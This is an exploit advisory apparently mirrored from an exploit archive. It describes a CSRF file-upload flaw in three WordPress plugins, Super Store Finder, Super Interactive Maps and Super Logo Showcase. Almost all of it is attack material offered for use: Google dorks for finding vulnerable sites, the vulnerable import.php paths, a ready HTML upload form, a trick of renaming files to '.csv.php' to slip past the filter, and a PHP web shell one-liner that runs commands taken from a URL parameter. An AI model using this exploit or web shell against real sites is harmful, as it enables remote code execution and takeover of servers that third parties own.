## https://sploitus.com/exploit?id=PACKETSTORM:159627
###############################################################################################################################  
# Exploit Title : SuperStoreFinder Wordpress Plugins CSRF File Upload  
# Wordpress Plugins Affected : Super Store Finder | Super Interactive Maps | Super Logo Showcase  
# Exploit Type : Cross Site Request Forgery  
# Plugin URI: http://www.superstorefinder.net/  
# Version : All versions 6.1 and below; the installed version is shown inside the file ->  
"/wp-content/plugins/superstorefinder-wp/super-store-finder.php"  
# Plugin Author : Joe Iz  
# Tested On : Windows  
# Google Dork : allinurl:"/plugins/superstorefinder-wp/"  
# allinurl:"/plugins/super-interactive-maps/"  
# allinurl:"/plugins/superlogoshowcase-wp/"  
#  
# Date : 08/10/2020 , 11:11 PM  
# Exploit Author : Eagle Eye  
# Greets : United Muslims Cyber Army Members  
#  
# VULN PATH :  
wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php  
#  
wp-content/plugins/superlogoshowcase-wp/sls-wp-admin/pages/import.php  
#  
wp-content/plugins/super-interactive-maps/sim-wp-admin/pages/import.php  
#  
###############################################################################################################################  
#  
# CSRF Code :  
#  
# <h1>Wordpress Plugins Super Store Finder Exploit</h1>  
# <br>  
# <form method="post"  
action="https://#webtarget#/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php"  
  
# enctype="multipart/form-data">  
# <input type="file" name="default_location" /> <input type="submit"  
value="Upload" />  
# </form>  
#  
# Uploaded Files :  
wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/SSF_WP_UPLOADS_PATH/csv/import/shell.csv.php  
# or  
# Uploaded Files :  
wp-content/plugins/superstorefinder-wp/ssf-wp-admin/shell.csv.php  
#  
wp-content/plugins/superlogoshowcase-wp/sls-wp-admin/shell.csv.php  
#  
wp-content/plugins/super-interactive-maps/sim-wp-admin/shell.csv.php  
#  
###############################################################################################################################  
# NOTES : *MOSTLY USING TAMPER DATA METHOD TO UPLOAD .PHP FILES*  
#  
# to upload shell , rename the shell to "shell.csv.php"  
# or using tamper data "shell.csv" -> "shell.csv.php"  
#  
# Bypassing some security if shell can't be uploaded (not for wordfence)  
# using simple php code inside the file we want to upload :  
#  
# <?php $str = $_GET['cmd']; system($str); ?>  
#  
# by using tamper data change to.csv.php extension and if successfully  
uploaded  
# just use rce method to upload your true shell  
#  
# Watch for more details :  
# https://www.youtube.com/watch?v=DQgmCYtUOhI&t=1s  
#  
###############################################################################################################################